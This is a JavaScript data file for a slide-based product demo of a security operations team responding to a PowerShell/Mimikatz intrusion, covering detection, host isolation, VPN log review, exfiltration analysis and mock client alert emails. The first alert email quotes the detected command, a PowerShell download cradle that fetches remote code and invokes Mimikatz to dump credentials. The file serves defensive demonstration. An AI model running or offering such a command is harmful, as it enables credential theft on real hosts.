import { Slide01 } from '../../../components/powershell/slide-01';
import { Slide02 } from '../../../components/powershell/slide-02';
import { Slide03 } from '../../../components/powershell/slide-03';
import { Slide04 } from '../../../components/powershell/slide-04';
import { Slide05 } from '../../../components/powershell/slide-05';
import { Slide06 } from '../../../components/powershell/slide-06';
import { Slide07 } from '../../../components/powershell/slide-07';
import { Slide08 } from '../../../components/powershell/slide-08';
import { Slide09 } from '../../../components/powershell/slide-09';
import { Slide10 } from '../../../components/powershell/slide-10';
import { Slide11 } from '../../../components/powershell/slide-11';
import { Slide12 } from '../../../components/powershell/slide-12';
import { Slide13 } from '../../../components/powershell/slide-13';
import { Slide14 } from '../../../components/powershell/slide-14';
import { Slide15 } from '../../../components/powershell/slide-15';
import { Slide16 } from '../../../components/powershell/slide-16';
import { Slide17 } from '../../../components/powershell/slide-17';
import { Slide18 } from '../../../components/powershell/slide-18';
import { Slide19 } from '../../../components/powershell/slide-19';
import { Slide20 } from '../../../components/powershell/slide-20';
import { Slide21 } from '../../../components/powershell/slide-21';
import { Slide22 } from '../../../components/powershell/slide-22';
import { Slide23 } from '../../../components/powershell/slide-23';
import { Slide24 } from '../../../components/powershell/slide-24';
import { Slide25 } from '../../../components/powershell/slide-25';
import { Slide26 } from '../../../components/powershell/slide-26';
import { Bug } from '../../../components/svg/bug';
import { Eye } from '../../../components/svg/eye';
import { CheckShield } from '../../../components/svg/check-shield';
import { Bell } from '../../../components/svg/bell';
import { Chip } from '../../../components/svg/chip';
import { Clock } from '../../../components/svg/clock';
import { Shield } from '../../../components/svg/shield';

export const POWERSHELL_CATEGORY = {
  MEMORY: 'Memory Scrape',
  INVESTIGATION: 'investigation',
  CONTAINMENT: 'containment',
  ESCALATION: 'escalation',
};

export const POWERSHELL_COLUMNS = [
  [POWERSHELL_CATEGORY.MEMORY],
  [POWERSHELL_CATEGORY.INVESTIGATION],
  [POWERSHELL_CATEGORY.CONTAINMENT],
  [POWERSHELL_CATEGORY.ESCALATION],
];

export const POWERSHELL_CATEGORY_ICONS = {
  [POWERSHELL_CATEGORY.MEMORY]: Chip,
  [POWERSHELL_CATEGORY.INVESTIGATION]: Eye,
  [POWERSHELL_CATEGORY.CONTAINMENT]: CheckShield,
  [POWERSHELL_CATEGORY.ESCALATION]: Bell,
};

export const powershellSlides = [
  {
    active: true,
    selected: true,
    slideOverview: true,

    title: 'Powershell: Bluesteel',
    subtitle: ' Scenario Overview',
    component: Slide01,
  },
  {
    title: 'Powershell: Bluesteel',
    subtitle: 'Endpoint Activity',
    product: 'eSentire MDR for Endpoint',
    time: '00:00:00:00',
    component: Slide02,
    icon: Bug,
    category: POWERSHELL_CATEGORY.MEMORY,
    appScreenshotUrl: require('../../../assets/powershell/blue-2.jpg'),
    description:
      'Attacker launches Powershell to run Mimikatz in an attempt to steal credentials from the host machine. Meta-data around the Powershell command is analyzed by BlueSteel, a machine learning, artifical intellengence engine.',
  },
  {
    title: 'Powershell: Bluesteel',
    subtitle: 'Bluesteel Trigger',
    product: 'eSentire MDR for Endpoint',
    time: '00:00:00:00',
    component: Slide03,
    category: POWERSHELL_CATEGORY.MEMORY,
    appScreenshotUrl: require('../../../assets/powershell/blue-3.jpg'),
    description:
      'Based on the command being used, it triggers a BlueSteel event from data collected from eSentire MDR for Endpoint.',
  },
  {
    title: 'Powershell: Bluesteel',
    subtitle: 'Endpoint Analysis',
    product: 'eSentire MDR for Endpoint',
    time: '00:00:00:35',
    component: Slide04,
    icon: Eye,
    category: POWERSHELL_CATEGORY.INVESTIGATION,
    appScreenshotUrl: require('../../../assets/powershell/blue-4.jpg'),
    description:
      'SOC confirms the incident. Checking the meta-data like: Who ran it? Which process called it? Determining if it was a false positive.',
  },
  {
    title: 'Powershell: Bluesteel',
    subtitle: 'Host Isolation',
    product: 'eSentire MDR for Endpoint',
    time: '00:00:00:45',
    component: Slide05,
    category: POWERSHELL_CATEGORY.INVESTIGATION,
    appScreenshotUrl: require('../../../assets/powershell/blue-5.jpg'),
    description: 'SOC isolates the host.',
  },
  {
    title: 'Powershell: Bluesteel',
    subtitle: 'Network Containment',
    product: 'eSentire MDR for Network',
    time: '00:00:01:00',
    component: Slide06,
    icon: CheckShield,
    category: POWERSHELL_CATEGORY.CONTAINMENT,
    appScreenshotUrl: require('../../../assets/powershell/blue-6.jpg'),
    description:
      'SOC performs a reverse DNS request to determine the IP of the domain hosting Mimikatz.',
  },
  {
    title: 'Powershell: Bluesteel',
    subtitle: 'Network Containment',
    product: 'eSentire MDR for Network',
    time: '00:00:01:10',
    component: Slide07,
    category: POWERSHELL_CATEGORY.CONTAINMENT,
    appScreenshotUrl: require('../../../assets/powershell/blue-7.jpg'),
    description:
      'With this information, the SOC will implement a TCP disruption on the client’s sensor.',
  },
  {
    title: 'Powershell: Bluesteel',
    subtitle: 'Global Blacklist (AMP) Containment',
    product: 'eSentire MDR for Network',
    time: '00:00:01:30',
    component: Slide08,
    category: POWERSHELL_CATEGORY.CONTAINMENT,
    appScreenshotUrl: require('../../../assets/powershell/blue-8.jpg'),
    description:
      'The SOC can also determine if this IP is a good candidate for the Global Blacklist (AMP). In this case, it is not.',
  },
  {
    title: 'Powershell: Bluesteel',
    subtitle: 'Client Alert',
    product:
      'eSentire MDR for Endpoint  +  eSentire MDR for Network  +  eSentire MDR for Log',
    time: '00:00:01:52',
    component: Slide09,
    icon: Bell,
    category: POWERSHELL_CATEGORY.ESCALATION,
    clientCommunication: true,
    // appScreenshotUrl: require('../../../assets/powershell/blue-9.jpg'),
    description: 'SOC alerts the client of the activity.',
    emailDemo: {
      title: '',
      start: [
        'eSentire has identified a successful network intrusion.\n[US Federal Agency/CERT Incident Category: CAT 1] ',
        'Please open a Priority 2 Ticket for desktop technicians to investigate the situation. ',
        'We recommend: ',
        '\ta) The system be isolated from the rest of the infrastructure immediately\n\tb) A manual Anti-Virus and Anti-Malware scan be performed with up-to-date signatures\n\tc) The system may need to be ke.ixgAgg4\n\td) A SHUN be placed on your firewall(s) to restrict back-channels ',
      ],
      table: [
        ['Local IP Address:', '192.168.10.27'],
        ['Local Hostname:', 'LEGAL-GT6'],
        ['Intrusion Vector:', 'Powershell'],
        [
          'Evidence of Instrusion',
          'eENDPOINT has detected the following malicious POWERSHELL code (Mimikatz) being ran on this host:\n\npowershell "IEX: (New-Object Net.WebClient.DownloadString("http://is.gd/oeoFui"); Invoke-Mimikatz-DumpCreds"',
        ],
      ],
      finish: [
        'As a precaution against further access, we are now temporarily disrupting traffic with all external malicious host(s) and the internal machine has been isolated. ',
        'Also, please acknowledge receipt of this alert. ',
      ],
    },
  },
  {
    title: 'Powershell: Bluesteel',
    subtitle: 'Escalation Initiated',
    product:
      'eSentire MDR for Endpoint  +  eSentire MDR for Network  +  eSentire MDR for Log',
    time: '00:00:02:12',
    component: Slide10,
    category: POWERSHELL_CATEGORY.ESCALATION,
    appScreenshotUrl: require('../../../assets/powershell/blue-10.jpg'),
    description: 'Escalator is initiated due to the alert’s severity.',
  },
  {
    title: 'Powershell: Bluesteel',
    subtitle: 'Escalation With Client',
    product:
      'eSentire MDR for Endpoint  +  eSentire MDR for Network  +  eSentire MDR for Log',
    time: '00:00:05:42',
    component: Slide11,
    clientCommunication: true,
    category: POWERSHELL_CATEGORY.ESCALATION,
    appScreenshotUrl: require('../../../assets/powershell/blue-11.jpg'),
    description:
      'Initial acknowledgement time is skipped and the client is called immediately. SOC informs the client that all users with access to machine should have their passwords reset immediately including local accounts on the endpoint.',
  },
  {
    title: 'Powershell: Bluesteel',
    subtitle: 'Deep Dive Initial Follow-up',
    product:
      'eSentire MDR for Endpoint  +  eSentire MDR for Network  +  eSentire MDR for Log',
    time: '00:00:05:57',
    component: Slide12,
    clientCommunication: true,
    category: POWERSHELL_CATEGORY.ESCALATION,
    // appScreenshotUrl: require('../../../assets/powershell/blue-12.jpg'),
    description:
      'Client asks for a deeper investigation into how the attacker gained access and what they did.',
    emailDemo: {
      title:
        'ESENTIRE ALERT: ESENTIRE CAMBRIDGE - THREAT INTRUSION - 192.168.10.27 - Acknowledgement Required - Ticket 1463251',
      start: [
        'Hi Matt, ',
        'Thank you for your call. As discussed, I have opened a ticket for you for the SOC to provide the following additional information:',
        '\t• How did the attacker gain access to the endpoint.\n\t• What other activities occurred on the endpoint.',
        'Please let me know if you have any additional questions.',
        "Regards, Craig Stoveld I Senior Analyst, SOC Customer Care I SSCP\neSentire Inc. — The Industry's only pure-ploy MDR provider. ",
        'Direct-to-SOC Toll Free North America +1 844 552 5837\nDirect-to-SOC Outside of North America +353 21 4757102\nUnited Kingdom Toll Free 0800 044 3242\nInternational +1 519 651 2200 x 5700 ',
      ],
    },
  },
  {
    title: 'Powershell: Bluesteel',
    subtitle: 'Access Investigation - Process Analysis',
    product: 'eSentire MDR for Endpoint',
    time: '00:00:06:57',
    component: Slide13,
    category: POWERSHELL_CATEGORY.ESCALATION,
    appScreenshotUrl: require('../../../assets/powershell/blue-13.jpg'),
    description:
      'Moving up the process tree, the Analyst determines that the user appears to have logged in from 10.1.108.5 over port 3389 (RDP).',
  },
  {
    title: 'Powershell: Bluesteel',
    subtitle: 'Access Investigation - Host Access Vector',
    product: 'eSentire MDR for Endpoint',
    time: '00:00:09:57',
    component: Slide14,
    // category: POWERSHELL_CATEGORY.ESCALATION,
    appScreenshotUrl: require('../../../assets/powershell/blue-14.jpg'),
    description:
      'SOC uses eSentire MDR for Endpoint data to figure out the hostname: NA-VPN.',
  },
  {
    title: 'Powershell: Bluesteel',
    subtitle: 'Access Investigation - VPN Login Source',
    product: 'eSentire MDR for Log',
    time: '00:00:10:12',
    component: Slide15,
    // category: POWERSHELL_CATEGORY.ESCALATION,
    appScreenshotUrl: require('../../../assets/powershell/blue-15.jpg'),
    description:
      'With this information, the Analyst pivots to eSentire MDR for Log to review the VPN logs.',
  },
  {
    title: 'Powershell: Bluesteel',
    subtitle: 'Access Investigation - Credentials Used',
    product: 'eSentire MDR for Log',
    time: '00:00:11:15',
    component: Slide16,
    // category: POWERSHELL_CATEGORY.ESCALATION,
    appScreenshotUrl: require('../../../assets/powershell/blue-16.jpg'),
    description:
      'The Analyst adjusts the search for all activity from the malicious IP address 132.232.163.233. No failed logins were found indicating that the account was compromised.',
  },
  {
    title: 'Powershell: Bluesteel',
    subtitle: 'Access Investigation - Network Containment',
    product: 'eSentire MDR for Network',
    time: '00:00:12:45',
    component: Slide17,
    // category: POWERSHELL_CATEGORY.ESCALATION,
    appScreenshotUrl: require('../../../assets/powershell/blue-17.jpg'),
    description:
      'SOC implements a TCP disruption against the Chinese IP address.',
  },
  {
    title: 'Powershell: Bluesteel',
    subtitle: 'Access Investigation Follow-up',
    product:
      'eSentire MDR for Endpoint  +  eSentire MDR for Network  +  eSentire MDR for Log',
    time: '00:00:13:05',
    component: Slide18,
    clientCommunication: true,
    // category: POWERSHELL_CATEGORY.ESCALATION,
    // appScreenshotUrl: require('../../../assets/powershell/blue-18.jpg'),
    description:
      'SOC informs the client about the attack vector and actions that should be taken.',
    emailDemo: {
      title:
        'RE: ESENTIRE ALERT: ESENTIRE CAMBRIDGE - THREAT INTRUSION - 192.168.10.27 - Acknowledgement Required - Ticket 1463251',
      start: [
        'Hi Matt,',
        'As an update, we have determined that the malicious attacker was able to access your network through your NA-VPN server. From the logs, it appears that the connection originated from IP 132.232.163.233 (China) and used credentials from PTHOMAS. There were no failed logins around the time, which would likely indicate that the account was previously compromised.',
        'We recommend:',
        "\t1. PTHOMAS's password is reset immediately or locked out until a reset can be performed.\n\t2. Discuss with PTHOMAS the situation and security awareness training including common phishing tactics.\n\t3. Multi-factor authentication be enabled.\n\t4. Triggers are implemented to detect login activity for countries outside of where your employees live. ",
        'We are continuing are investigation around the post incident activity and will update you once completed. Please let us know if you have any questions.\nRegards,',
        "Craig Stoveld I Senior Analyst. SOC Customer Care I SSCP\neSentire Inc. - The Industry's only pure-ploy MDR provider. ",
        'Direct-to-SOC Toll Free North America +1 844 552 5837\nDirect-to-SOC Outside of North America +353 21 4757102\nUnited Kingdom Toll Free 0800 044 3242\nInternational +1 519 651 2200 x 5700 ',
      ],
    },
  },
  {
    title: 'Powershell: Bluesteel',
    subtitle: 'Post Investigation - Process Analysis',
    product: 'eSentire MDR for Endpoint',
    time: '00:00:14:05',
    component: Slide19,
    category: POWERSHELL_CATEGORY.ESCALATION,
    appScreenshotUrl: require('../../../assets/powershell/blue-19.jpg'),
    description:
      'The SOC looks at the processes around that time and locates an unusual network connection over port 80 to win22.googlle.cc (IP 118.114.77.92).',
  },
  {
    title: 'Powershell: Bluesteel',
    subtitle: 'Post Investigation - Packet Review',
    product: 'eSentire MDR for Network',
    time: '00:30:12',
    component: Slide20,
    // category: POWERSHELL_CATEGORY.ESCALATION,
    appScreenshotUrl: require('../../../assets/powershell/blue-20.jpg'),
    description:
      'With this information, the SOC can pivot to the packet capture on the eSentire MDR for Network device and see what was exchanged.',
  },
  {
    title: 'Powershell: Bluesteel',
    subtitle: 'Post Investigation - Post Requests',
    product: 'eSentire MDR for Network',
    time: '00:00:32:02',
    component: Slide21,
    // category: POWERSHELL_CATEGORY.ESCALATION,
    appScreenshotUrl: require('../../../assets/powershell/blue-21.jpg'),
    description:
      'The packets show that multiple chunks of data is being passed to the malicious IP.',
  },
  {
    title: 'Powershell: Bluesteel',
    subtitle: 'Post Investigation - File Extraction',
    product: 'eSentire MDR for Network',
    time: '00:00:37:02',
    component: Slide22,
    // category: POWERSHELL_CATEGORY.ESCALATION,
    appScreenshotUrl: require('../../../assets/powershell/blue-22.jpg'),
    description:
      'Using Bro, the Analyst can extract the files being exfiltrated.',
  },
  {
    title: 'Powershell: Bluesteel',
    subtitle: 'Post Investigation - Extracted File Review',
    product:
      'eSentire MDR for Endpoint  +  eSentire MDR for Network  +  eSentire MDR for Log',
    time: '00:00:40:02',
    component: Slide23,
    // category: POWERSHELL_CATEGORY.ESCALATION,
    appScreenshotUrl: require('../../../assets/powershell/blue-23.jpg'),
    description:
      'After determining the extension, the Analyst can review the contents being exfiltrated with the clients approval. In this case, the Analyst locates that the attacker exfiltrated a few acquired credentials and confidential files.',
  },
  {
    title: 'Powershell: Bluesteel',
    subtitle: 'Post Investigation - Network Containment',
    product: 'eSentire MDR for Network',
    time: '00:00:47:23',
    component: Slide24,
    category: POWERSHELL_CATEGORY.ESCALATION,
    appScreenshotUrl: require('../../../assets/powershell/blue-24.jpg'),
    description:
      'SOC implements a TCP disruption against the additional Chinese IP address.',
  },
  {
    title: 'Powershell: Bluesteel',
    subtitle: 'Post Investigation Follow-up',
    product:
      'eSentire MDR for Endpoint  +  eSentire MDR for Network  +  eSentire MDR for Log',
    time: '00:00:47:45',
    component: Slide25,
    clientCommunication: true,
    category: POWERSHELL_CATEGORY.ESCALATION,
    // appScreenshotUrl: require('../../../assets/powershell/blue-25.jpg'),
    description:
      'SOC updates the client about the information that was exfiltrated and additional recommendations.',
    emailDemo: {
      title:
        'RE: ESENTIRE ALERT: ESENTIRE CAMBRIDGE - THREAT INTRUSION - 192.168.1027 - Acknowledgement Required - Ticket 1463251 ',
      start: [
        'Hi Matt, ',
        'As an update related to the post incident activity, the attacker exfiltrated 4 confidential files and 1 file containing passwords. We have uploaded the files to our SFTP website in a password protected zip file. Please call into the SOC to receive your credentials and a SMS phone number to receive the zip file password. ',
        'We recommend:',
        '\t• Reset all passwords related to the credentials exfiltrated by the attacker.\n\t• Implement a DLP service / product to detect exfitration of confidential documents.\n\t• Review all confidential documents and engage with your legal team to determine if further action is required.',
        'As always, please let us know if you require any additional information or have any questions.\nRegards,',
        "Craig Stoveld J Senior Analyst, SOC Customer Care I SSCP\neSentrre Inc — The Industry's only pure-ploy MDR provider. ",
        'Direct-to-SOC Toll Free North America +1 844 552 5837\nDirect-to-SOC Outside of North America +353 21 4757102\nUnited Kingdom Toll Free 0800 044 3242\nInternational +1 519 651 2200 x 5700 ',
      ],
    },
  },
  // Timeline
  {
    title: 'Powershell: Bluesteel',
    subtitle: 'Timeline Summary',
    component: Slide26,
    icon: Clock,
    timelineSummary: true,
    category: POWERSHELL_CATEGORY.ESCALATION,
  },
];
